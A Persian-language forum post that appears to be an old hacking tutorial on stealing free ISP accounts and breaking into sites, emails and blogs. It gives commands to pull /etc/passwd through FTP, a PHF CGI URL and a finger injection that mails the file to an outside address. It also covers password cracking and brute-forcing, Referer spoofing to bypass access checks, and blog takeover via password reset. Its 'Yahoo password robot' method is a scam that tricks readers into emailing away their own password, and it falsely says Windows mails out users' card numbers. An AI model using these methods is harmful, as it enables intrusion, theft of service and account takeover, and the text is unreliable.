P30-ART


ارسال موضوع ارسال پاسخ
 
امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
هک چیست و هکر کیست و چگونه میشود هک کرد؟
نویسنده پیام
ناظم انجمن
*****

ارسال‌ها: 79
تاریخ عضویت: خرداد 1393
اعتبار: 15
وضعیت : آفلاین
جنسیت:
سپاس ها 17
سپاس شده 123 بار در 69 ارسال
ارسال: #1
هک چیست و هکر کیست و چگونه میشود هک کرد؟
هک چیست و هکر کیست و چگونه میشود هک کرد؟
نیاز ما به امنیت کامپیوتری... چرا؟
هزاران نفر در عرض روز آن لاین هستند چه به خاطر شغل و چه به صورت خصوصی.این رشد اینترنتی رو در کل انفجار اینترنتی می نامند و این رشد روند رشد اینترنت رو با خودش عوض می کنه سال پیش همه سرورها از طرف آدمهای تکنسین مدیریت می شدند که به یک مساله بیش از همه چیز اهمیت می دادند : امنیت سرور. ولی امروزه اکثر سرورها رو آدمهای معمولی مدیریت می کنند که بین اونها خیلی کم افرادی پیدا میشن که اطلاعات کافی در مورد محافظت کردن سرورهاشون دارند. آمار اینجور سرورها به طرز معجزه آسایی رو به افزایش است. با وجود این باز هم مدیران شرکتهای بزرگ مردم رو به این راه تشویق می کنند و ادعای این رو می کنند که اینترت امن است. آیا این مساله درست است؟ نه
برای اینجور افراد دروغ گفتن جزو زندگی روزمره حساب میشه ولی از یک طرف هم بخوبی این مساله رو می دونند که اینترنت مکان امنی نیست. این مساله روز به روز بدتر خواهد شد چون افرادی که اطلاع کافی در این رابطه ندارند فکر می کنند که همه چیز مرتب و درست است. ولی واقعیت از چیز دیگری صحبت می کند : همه روزه هکرها و کناکر ها به تعداد بیشماری از سرورهای به ظاهر امن نفوذ می کنند. بحث کار کردن افرادی که اطلاع خیلی کمی راجع به امنیت دارند در یک شبکه خیلی خیی مهمه. اینگونه افراد نور چشمی های هکرها هستند چون همین هاهستند که در ها رو با وجود همه مسائل امنیتی به روی هکرها باز می کنند. مدیران کارکشته شبکه به این موضوع خواهند خندید : مگر می شود  که شخصی نداند که چه برنامه ای و چه تولزی روی سیستمش کار میکند؟ جواب : بله میشود! مثال : کدوم یک از شماها میدونین که با برنامه ورد پرفکت که زیر ام اس داس کار میکرد برنامه ای بود به اسم : قبر! این زیر برنامه از طریق یک پنجره فرمان امکان تهیه اسکرین شوتتز رو از زیر همه برنامه های زیر داس به کاربر میداد. در زمان خودش همچین آپشنی زیر یک برنامه واژه نگار کاملا جدید بود. این برنامه زیر برنامه دیگری به اسم کانورت داشت ! که اون کار درست کردن فایلهایی رو بر عهده داشت که مستقیم زیر ورد ایمپورت می شدند
نکنه جالب توجه اینه که امکان دسترسی مستقیم به این تولزها از زیر ورد نبود! برای همین خیلی کم افرادی پیدا می شدند که از این برنامه و تولزها آگاهی داشتند.چه جوابی دارین اگر که من بگم : زیر یکی از آپشن های ویندوز این آپشن وچود داره که ویندوز به محظ اینکه شما آن لاین میشین تمام فایلهای خصوصی شماره سریال های برنامه هاتون و شماره کارت اعتباری شما رو به یک آدرس میل میکنه؟ این آپشن میشه که غیر فعال بشه ولی شما از فعال بودنش خبر داشتین که اقدام به غیر فعال کردنش بکنین ؟ نتیجه یک آمار گیری میگه: از هر 800 نفری که همیشه برای یک مقصود خاص از یک برنامه مشخص استفاده می کنند تنها 2 نفر از برنامه به طور کامل استفاده میکنند!! با روند رشد اینترنت شرکتهای تولید نرم افزار نیز سریع خود را رشد دادند و همزمان برنامه های متنوع تولید کردند. برای اینگونه شرکتها فقط و فقط یک چیز مهم است و بس : فروش نرم افزارشان! برای اینگونه شرکتها هیچ اهمیتی ندارد که برنامه ای که شما می خرید امنیت سیستم شما را پایین می آورند. برای تولید کنندگان نرم افزار هیچ گونه اهمیتی ندارد که یک فایل کانفیگوریشن شده سیستم از طرف شما به وسیله این برنامه بازنویسی شود.
 
فرق بین هکرها و کناکرها HACKER & KNACKER
 
هکر که به غلط در ذهن اکثر مردم یک خراب کار را تدائی می کند یک خراب کار نیست. هکر ها معمولا برنامه نویسان سیستم هستند که از بقیه برنامه نویسان باهوشتر بوده  و سوراخهای حغاظتی را شناسایی می کنند تا این سوراخها شکافها را در جای دیگری پر کنند. یک هکر می تواند مدیریت یک شبکه رو برعهده داشته باشد و برای محافظت کردن شبکه خودش از دسترس دزدی های الکترونیکی باید دست به دزدیهای الکترونیکی غیر مجاز بزند. ولی ورود غیر مجاز به مثلا یک محدوده حفاظت شده توسط پسورد تا زمانی که منجر به ضرر و زیان نشود که خراب کاری نیست. خراب کاری را کناکر ها انجام می دهند. یک کناکر برعکس یک هکر به سیستمها رخنه کرده فقط و فقط به منظور خراب کاری.بنابراین کناکر ها هستند که آسیبها رو به سیستمهای ما می رسانند نه هکر ها.
 
کارت اینتر نت مجانی (هک ISP)
Unixیکی از سرورهایی است که در جهان بسیار از آن استفاده می شود در ایران و دربیشتر شهر های بزرگ هم ISPهایی وجود دارند که سرور آن ها Unixباشند .بنابر این شما می توانید برای هک آن ها از این راه ها استفاده کنید شما در این راه احتمالا با مشکلات زیادی برخورد خواهید کرد .من راه کامل و بی عیبی را در اختیار شما نمی گذارم برای نفوذ گر شدن باید تلاش بسیاری کرد و این اشاره ای است که شما را به طرف راه درست هدایت می کند .برای هک یونیکس از این طریق عمل می کنند که با روش هایی که ذکر خواهد شد فایل حاوی Passwordها و IDها را که به نام Passwdمی باشد دریافت کنند .این فایل یک فایل متنی است که در آن اطلاعات بصورت رمز در آمده .وقتی شما یک فایل Passwdرا باز کنید چنین نوشته هایی را می بینید .که باید آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh                   administrator:/home/Common/WWW:/bin/csh admin:rYsKMjnvRppro:100:11:WWW   Taha:3A62i9qr:1012:10:Mashhad
 
در اینجا مثلا Tahaنام IDو 3a62...کلمه عبور اما به صورت رمز در آمده می باشد . شاید فایل به شکل زیر هم باشد .اما این فایل کار را غیرممکن می سازد.در صورتی که به شکل زیر باشد یعنی در آن علامت *به جای کلمه ی به رمز آمده به آن ها Shadowedگفته می شود .
root:*:0:1:Operator:/:/bin/csh
administrator:/home/Common/WWW:/bin/csh admin:*:100:11:WWW
BFH:/home/user/Taha:/usr/local/bin/tcsh
Taha:*:1012:10:mashhad
ما فعلا می خواهیم این فایل را دریافت کنیم .اولین قدم این است که آیدی در آن ISPبرای خود دست و پا کنیم .حالا این آیدی می تواند متعلق به دوستمان باشد و یا یک آشنای دور .پیدا کردن رمز دوست شما به سادگی میسر است که در حوصله این مقاله نمی گنجد .بعد از پیدا کردن رمز شما با آیدی دوستتان به شبکه Connectشوید .این اتصال می تواند یک اتصال به طریق Modem DialUp Connectionباشد .بعد از اتصال کامل وارد قسمت MS-DOS Promptشوید و فرمان زیر را وارد کنید
FTP http://www.domain.com/
که Domainآدرس سرور ISPمی باشد سپس از شما خواسته می شود تا آیدی خود را وارد کنید کلمه ی Anonymousرا بزنید .سپس وقتی درخواست کلمه عبور شد کلید Enterرا بزنید .اگر وارد سیستم شدید موفق شده اید در غیر این صورت جمله ی login     failedدریافت می شود .دوباره امتحان کنید و این بار در کادر Passwordآدرس Emailای را وارد کنید .اگر این بار هم جواب نداد به جای کلمه ی anonymousاز Userخود یعنی دوستتان استفاده کنید . احتمال دارد این بار هم موفق نشوید .این دفعه روش های فوق را برای دستور زیر امتحان کنید :
 
FTP http://ftp.domain.com
اگر این بار هم جوابی نگرفتید با ISPتماس گرفته و سوال کنید که چگونه می توانم از سرور FTPخود شما استفاده کنم چون وارد سیتمتان نمی شود اگر پرسید برای چه می خواهید وارد شوید بگویید می خواهم از نرم افزار های آن استفاده کنم ولی مواظب باشید که نام خود را نگویید .خلاصه تمام تلاش خود را برای فهمیدن روش دستیابی به سیستم بکنید اگر توانستید وارد سیستم شوید به راحتی می توانید وارد شاخه ی مشخصی رفته و فایل Passwdها را بگیرید ولی احتمال دارد که آن شاخه برای شما قفل شده باشد .برای کار با FTPباید دستورات FTPرا یاد داشته باشید .برای لسیت دستورات می توانید ?را تایپ کنید .ابتدا به شاخه ی ETCبروید می توانید فایل passwdرا در آنجا پیدا کنید .این فایل را بگیرید .اگر در آنجا نبود شاخه های دیگر را امتحان کنید .ولی به احتمال زیاد همانجاست .حال اگر اصلا نتوانستید وارد FTPشوید می توانید این فایل را با استفاده از قایلبیت PHFبگیرید .به این صورت که در Internet Browserخود آدرس زیر را وارد کنید .
http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
اگر به این صورت هم نتوانستید آن را بگیرید می توانید از طریق Fingerاین کار را انجام دهید .این روش به شرطی جواب می دهد که Serverمورد نظر قابلیت Fingerرا داشته باشد .به آدرس زیر مراجعه کنید
http://www.domain.com/cgi-bin/finger
اگر این آدرس کار نکند دیگر هیچ امیدی نیست اما اگر کار کند کادری جلوی شما ظاهر می شود که می خواهد نام مورد نظر خود را بدهید .آدرس زیر را وارد کنید . <etc/passwd
ID@domain.com ; /bin/mail you@somewhere.com
که در این آدرس IDشناسه کاربری یک شخص است که مثلا می توانید از آیدی دوستتان استفاده کنید domain.comآدرس نام حوزه ی ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا این یک نمونه است .
etc/passwd>
bfh@internet.com ; /bin/mail lover_agf@yahoo.com با وارد کردن این دستور فایل Passwdبرای من به آدرس lover_agf@yahoo.com پست می شود ! خوب حالا تا الان اگر توانسته اید فایل را گرفته باشید که بهتر در غیر اینصورت باید بی خیال این روش شوید .
حالا اگر فایل shadowedگیر آوردید بقیه ی متن را نخوانید چون کمکی به شما نمی کند و باید از روش های دیگری استفاده کرد .اما اگر یک فایل مثل نمونه اولی که در بالا بود گیر آوردید می توانید کار خود را ادامه دهید حالا شما نیاز به یک برنامه ی Unix Password Crackerدارید معروف ترین این نوع برنامه ها John Ripperو Cracker Jackمی باشد .اما John Ripper سریعترین نوع این برنامه می باشد .این دو برنامه را می توانید از همان آدرس قبلی یعنی
http://www.hack-boys.web1000.com دست بیاورید اما نمونه ی دیگری از این نمونه برنامه ها به کتابخانه هک به نام jill_v20 ارسال شد .با استفاده از این برنامه ها می توانید به هدف خود برسید .
نرم افزارهای (KSN و  Unsecurev1.2)
با این نرم افزار ها که این نسخه ها ی آن تحت ویندوز کار می کند به راحتی می توانید در مدت زمانی کم اکانت را بدست آورید.کار هردو نرم افزار شبیه هم است. خوب من قسمتهای مختلف اونو توضیح میدم. اما این برای ISPهایی است که پورت ??یا ?? اونها باز باشه.
Compuetrname or Ip: در این قسمت شما یا آدرس اینترنتی ISP خودتان را بنویسید یا IP آن را که به نظر من IP کا رتان را سریعتر میکند.
Port: در این قسمت یا باید پورت ?? یا 79 را بنویسید برای همین میگویم این روش فقط برای ISP هایی است که پورت ?? یا ?? اونها بازباشد
Current Password: در این قسمت هیچ چیزی ننویسید.
 Username: یک یوزر حدس بزنیدکه من طریقه حدس یوزر را در بالا گفته ام
Dictionary File: در این قسمت شما باید یک لیست پسورد با توجه به پسورد ISPخودتان درست کنید. البته در این برنامه یک لیست پسورد است اما شما باید با توجه به ISP خودتان حدس بزنید.مثلا من یه ISP رو دیدم پسوردهایش عدد است که شما باید یه لیست پسورد فقط با عدد درست کنید
Dictionary attack: اگه یک لیست پسورد درست کردید و آدرس آن را از هارد منتقل کردید این گزینه را تیک بزنید.
Brute Force attack: این گزینه برای این است که نرم افزار به طور وحشیانه در لیست پسورد به دنبال پسورد واقعی بگردد شما حتما این را تیک بزنید.
Reconnect on Disconnect:این را هم حتما تیک بزنید.باعث میشود که ارتباط شما به کامپیوتر سرور قطع نشود و شما بتنوانید اینترنت سرقت کنید.
 Auto Save Evry 100 Atempts:هر ??? بار یک بار تغییراتتان را Save میکند.این هم حتما تیک بزنید.پس هر چهار گزینه ی قسمت دوم را تیک بزنید.
Brute Force Option: این قسمت به شما کمک میکند که شما در مدت زمان کمتری اکانت رایگان رو بدست آورید پس تنظیماتش را خوب درست کنید.مثلا شما معلوم میکنید که پسورد فقط از حرف تشکیل شده یا عدد یا با هم که بستگی به ISP شما دارد.و خودتان میدانید.
در قسمتNumber of Charecters on start  شما مشخص میکنید که پسورد از چند کارکتر تشکیل شده مثلا پسورد br1058 از 6 کارکتر تشکیل شده پس شما عدد6 را بنویسید. تمام ISPها از یک آرنج و نهضت خاصی استفاده میکنند که این بستگی به هوش هکری شما دارد.البته یک مقدار شانس هم بد نیست. بعد از اتمام کار دگمه Connect را بزنید و منتظر شوید که اینترنت رایگان در مانیتور شما دیده شود و شما دیگر پول کارت اینترنت را ندهید.
 
هک کردن سایت
spoofing  یک روش معتبر است که توسط خیلی از سایت های بزرگِ امروزی برای رسیدن به مقاصدِ خودشون استفاده می شود. سایت های بزرگِ امروزی اکثرا به یکی از روش های زیر محافظات میشوند: :arrow: /.htaccess در این روش فایل .htaccess در منطقه محافظات شده ی سایت قرار میگیرد که در ان آدرس فایل ای که password ها در ان قرار گرفته وجود دارد.
:arrow سایت مخفی: در این روش user و pass شما توسط برنامه های سایت با database پسورد ها مطابقت داده میشود و شما در صورت مطابقت داشتن password به یک URL انتقال داده میشوید که این URL هر بار تغییر میکند.
:arrow: Referal این موضوع این مطلبِ آموزشی هست.سایت محافظات شده وقتی به شما اجازه دسترسی میدهد که شما فقط و فقط از طریق یک URL مشخص به سایت وارد شده باشید. این روش هم از یک فایل /.htaccess استفاده میکنه ولی به این تفاوت که بجای داشتن آدرس فایل محتوی user و پسورد ها در اون یک سری خطهای "Mod_rewrite" قرار دارد.

برای مثال:
کد
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://WebMaster_Domain.index.html or blablabla_domainyoutrust.*$
RewriteRule .* blabla...

 
 
شما نیازی به دانستن همه این دستورات ندارید و این فقط یه نمونه برای آشنایی بود
وقتی که فایل .htaccess چک میکند که شما از طریق URL مشخص وارد شدید یا نه ? حالت اتفاق می افتد:
?-شما از URL مشخص وارد شدید بنابرین شما اجازه داخل شدن دارید
?-شما از URL مشخص وارد نشدید و اجازه ی داخل شدن ندارید.و browser شما به صفحه دیگری انتقال داده میشود که در ان پیغام error درج شده است.  

اطلاعات moghadamti.
:arrow: HTTP چیست؟
مجموعه ای ازروش ها و قوانینی که برای انتقالِ data و اطلاعات بر روی شبکه تار عنکبوتی جهانی ( world wide web )مورد استفاده قرار می گیرد.
اگر data ها طبق این قوانین منتقل نشوند پیغام error ظاهر میشود. انتقال دهندگان ِ data در HTTP شامل درخواست کننده اطلاعات (client) و فرستنده اطلاعات که میتونه یک سایت یا شخص باشه (سرور)،نامیده می شوند. در هر درخواستی که از سوی client به سرور فرستاده میشود شامل بخشی به نام "http HEADER" می باشد. خود "http HEADER" شامل تعدادی HEADER FIELDS" است.  "HEADER FIELD"ها برای مشخص کردن نوع درخواست و برنامه ای که درخواست را به سرور ارسال کرده است به کار می روند، تا سرور با توجه به نوع برنامه اطلاعات را ارسال کند،به عنوان مثال ویندوز media player نمی تواند فایل های txt را باز کند.. در زیر یک نمونه "http HEADER" را مشاهده می کنید...  
کد
GET http://www.microsoft.com/ HTTP/?.?
Accept: image/jpeg، image/pjpeg، application/vnd.ms-powerpoint،
application/vnd.ms-excel، application/msword، */*
Accept-Language: ان-us
Accept-Encoding: gzip، deflate
User-Agent: Mozilla/?.? (compatible؛ MSIE ?.??؛ ویندوز ??)
Host: http://www.microsoft.com
Proxy-Connection: Keep-Alive

 
  یکی از header field ها "referer feild" هست.که معمولا به شکل زیر می باشد.
کد
Referer: http://www.phacker.tk/programs.htm

 
 وقتی که شما به vasile یه browser (اینترنت Explorer،Netscape، Opera،
NeoPlanet،Hotjava، Mozilla یا CubicEye) وارد سایتی می شوید browser
"referer feild" را به آخرین url ای که درخواست شما به اون فرستاده
شده تغییر می دهد. به عنوانِ مثال هر وقت شما اول به سایت http://www.google.com/ بروید و بعد رو لینک "Add your ad تو گوگلِ today" کلیک کنید، آخرین صفحه ای که شما بازدید کردید http://www.google.com/ است. بنا برین "referer feild" به صورتِ خودکار و کاملا مخفی به این
صورت تنظیم میشود:
کد
Referer: http://www.google.com/

 
 تنها حالتی که درخواست ِ شما "referer feild" ندارد حالتی است که شما به تازگی browser را باز کرده باشید یا url مربوطِ را تایپ یا کپی پیست کنید. در بقیه حالات هر وقت شما رو یک لینک کلیک کنید همیشه دارای "referer feild" هستید. referer برای این بکار میرود که سایت ها با مشاهده اینکه بیشترِ visitor های خود از طریق کدام سایت وارد شدند (یا همین تبلیغات که با هر بر کلیک
کردن مقداری پول به webmaster سایت داده میشود) و یا اینکه شما می خواهید قسمتی از سایت در اختیارِ عموم نباشد و فقط کسی که از url خاصی وارد شد به محتویات سایت دسترسی داشته باشد.
خوب حالا فهمیدیم که referer ها برای چی بکار میروند.
:ex حالا ممکنه این سوال برای شما پیش بیاد که چه جوری میشه referer رو تغییر داد به چیزی که ما میخواهیم؟

یک browser درخواست رابه وسیله request-URL و HTTP headers تولید میکند و به سایت مورد نظرمی فرستد ،بنابراین چرا برنامه خود شما این کار و نکند و مشخصات را به هر چه که میخواهید تغییر ندهد و برای سرور نفرستد؟
:idea خوب البته که این امکان pazire!!:دارد بنابرین اگر شما mikhayn به یک سایت بگید که من از سایت http://www.google.com/ آمدم در صورتیکه واقعا اینطور نیست؛) شما فقط باید یک برنامه بنویسید که یک درخواست بسازد و در "Referer field" http://www.google.com/ را وارد کند!!!
به این صورت:
کد
GET http://www.microsoft.com/directx HTTP/?.?
Accept: */*
Referer: http://www.google.com/
Accept-Language: ان-us
Accept-Encoding: gzip، deflate
User-Agent: Mozilla/?.? (compatible؛ MSIE ?.??؛ ویندوز ??)
Host: http://www.microsoft.com

 
 خوب این درخواست میگه که شما از طریق گوگلِ به سایت http://www.microsoft.com/directx rafitd. آیا واقعا اینطور است؟؟ منتظرِ پست بعدی باشید برای ادامه آموزش... شاد باشد

Referer url ها برای امنیت به کار میروند
بعضی سایت ها متاسفانه یا خوشبختانه از Referer URl ها برای امنیتِ سایت استفاده میکنند. به عنوانِ مثال یک User فقط هنگامی اجازه داردِ که به یک صفحه در قسمت protect شده سایت دسترسی داشته باشه که از یک referer url خاص وارد اون بشه.بعضی سایت ها(نه همه اونها)از این روش استفاده می کنند. در این روش وقتی شما User و پس رو وارد فرم میکنید و بر روی submit کلیک می کنید اطلاعات شما به یک CGI script بر روی سرور فرستاده میشود، و اگر user و پسورد درست
باشد شما به URL محافظات شده تغییر جهت میدهید.
برای مثال:
http://www.somesite.com/login.cgi =======>
http://www.somesite.com/confidentialdata/ حالا،وقتی url ِ http://www.somesites.com/confidentialdata/ درخواست
میشود سرور referer url و چک میکند. چرا؟ خوب بدلیلِ اینکه فقط CGI script اجازه دارد که شما را refer دهد تو URL محافظات شده ،فقط در هنگامی که user و passe شما درست باشد .

عبور کردن از روش امنیتی referer
همه چیزایی که شما نیاز دارید این است که refere url و url محافظات شده را پیدا کنید و هورا!!! شما میتونی از برنامه مورد علاقه خود تون برای تغییر دادن Request (درخواست) استفاده کنید و referer url  را به CGI script و targetرا به url مخفی تغییر دهید ؛ فقط مهم ترین چیز پیدا کردن referer و url مخفی ، صحیح است. پیدا کردن referer زیاد سخت نیست تنها کاری که شما باید انجام دهید این است که به جای user و پس هر چیزی قرار دهید و submit را بزنید url ای که بعد از کلیک کردن روی submit به نمایش در میاد همون  url referer هست البته من خودم شخصاً فکر میکنم استفاده کردن از source فایل html مطمئن تر باشه به این صورت که source فایل html را با notepad باز کنید و به دنبالِ شبیه این نوشته بگردید:  
کد
 <فرم method=پست action="http://www.somesite.com/login.cgi">

 
 وقتی این نوشته را پیدا کردید http://www.somesite.com/login.cgi همون referer شما است
برای پیدا کردن url مخفی : راحت ترین کار این است که شما یه User و پس از اون سایت داشته باشید و به url مورد نظر دست پیدا کنید. البته در بیشترِ حالتها شما ممکنه که نتونید به user و پس درست دست پیدا کنید، برای این حالتها من توصیه میکنم با برنامه هایی مثل intellitamper سایت را برای directory هایی مثل /secret/،/content/ etc search کنید و url فایل های htmlدرونِ اونو پیدا کنید .

intellitamper
idea: در بعضی مواقع ممکنه که نتایج حاصل از search مطلوب نباشه یا سایت مورد نظر درخواستِ مربوط به search و قبول نکنه.
چند برنامه وجود دارد که میتونید از اونها برای تغییر دادن requet استفاده کنید:
?)A4Proxy:
http://www.somesite.com/login.cgi
?)add را بزنید خوب در سمتِ چپ این را مشاهده میکنید:
[code'>
referer: http://www.somesite.com/login.cgi

خوب حالا به url مخفی بروید!!!
به همین سادگی
?)RefCheat by Ksoze
?)م-Spoofer
خوب در پایان شاید شما متوجه شده باشید که این خیلی روش ساده ای برای نفوذ است پس چرا دیگران از این روش استفاده نمیکنند؟ خوب در جواب باید بگم که فقط افرادِ محدودی از این روش آگاهی دارند و خیلی از این افراد نمی خواهندکه با دیگران در میان بذارند و افرادی هم که اطلاع ندارند برایشان مهم نیست!!!
هک کردن ایمیل
از طریق فریب دادن روبات پسورد یاب یاهو
1-برای اینکار شما باید یک ویروس که روبات پسورد یاب یاهو را گول می زند برای سایت یاهو بفرستید
ابتدا وارد Compose ایمیل خودتان شوید
2- در قسمت نشانی گیرنده یا To ایمیل زیر را می نویسید
hack_mailserver@yahoo.com
3- در قسمت موضوع یا همان Subject عبارت زیر را می نویسید
password retrieve
4- در قسمت متن نامه به ترتیب زیر عمل می کنید.
در خط اول ایمیل کسی که می خواهید هک کنید را می نویسید در خط دوم ایمیل خودتان را می نویسید در خط سوم پسورد ایمیل خودتان را می نویسید در خط چهارم متن زیر را به دقت تایپ می کنید:
cgi-bin/$et76431%20mail/pass%30send%30pwrsa/jfh-2e28e5e4gj95u2518e5746id( ایمیل قربانی را بنویسید)
بعد از تایپ متن بالا Send را بزنید اگر تمامی دستورات را انجام داده باشید پسورد قربانی در 24 ساعت آینده برای شما فرستاده می شود.
هک وبلاگ
برای هک کردن یک وبلاگ باید حتما رمزش رو پیدا کنیم (بر خلاف سایت) همان طور که احتمالا خودتون بهتر از من می دونید? پیدا کردن رمز وبلاگ کار ساده ای نیست... یعنی به این سادگی ها نیست  اما راه توپی هست که همه از آن استفاده می کنند برای هک کردن : وقتی رمز خود را در پرشیان بلاگ فراموش کنید راهی جر این ندارید که از گزینه رمز خود را فراموش کرده ام استفاده کنید... برای پیدا کردن این گزینه با یه رمز اشتباه توی پرشن بلاگ وارد شوید تا پیغام بیاد که : رمز شما اشتباه است ! وقتی این صفحه بیاد یک قسمت جدید هم داره که نوشته : رمز خود را فراموش کرده ام این دکمه را بفشارید تا صفحه مربوط به آن باز شود... درون این صفحه یک فرم وجود دارد که از شما می خواهد که ایمیل خود و اسم وبلاگ را بنویسید /./ خب ؛ قسمت اول که باید اسم وبلاگ رو بنویسید که مشکلی نداره ... به راحتی اسم اون وبلاگی که می خواهید هکش کنید را بنویسید ... اما قسمت دوم : این قسمت از شما ایمیل می خواهد... برای پیدا کردن اون ایمیل باید وارد بلاگ طرف بشوید و از اونجا ایمیل او را بخوانید ... کاری نداره ؛.؛.؛ با این کار رمز به ایمیل ارسال می شود... اما مهم اینه که این ایمیل مال شما نیست و در حقیقت شما با این کار رمز را برای اون شخص که صاحب ایمیل است می فرستید‌(توجه کنید که در مرحله قبل هر ایمیلی رو نمی تونید بدین...باید ایمیلی که در بلاگ ثبت شده وارد بشه) حالا ما از این مساله استفاده می کنیم و با پیدا کردن رمز ایمیل طرف و وارد شدن به ایمیل او ? رمزی که با استفاده از مرحله قبل به ایمیل طرف فرستاده ایم رو در ایمیل خود او می خوانیم

موفق باشید
06-01-1393 09:20 ب.ظ
یافتن تمامی ارسال‌های این کاربر نقل قول این ارسال در یک پاسخ
 سپاس شده توسط alivesali
ارسال موضوع ارسال پاسخ


پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان